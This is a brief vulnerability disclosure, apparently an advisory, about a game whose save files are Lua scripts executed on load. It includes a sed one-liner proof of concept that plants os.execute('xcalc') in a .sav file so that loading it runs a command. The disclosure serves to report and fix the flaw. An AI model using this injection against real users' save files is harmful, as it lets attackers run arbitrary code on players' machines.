Save games files consist of Lua script to execute during load. Assuming that users may
load malicious save games, for example downloaded or received from other users,
arbitrary code may be executed on their machines.
savestruct_internal.c, void load_game_data(char *strin)
sed -i -e '0,/^$/s/^$/os.execute("xcalc")/' $CH.sav
Loading the save will run xcalc.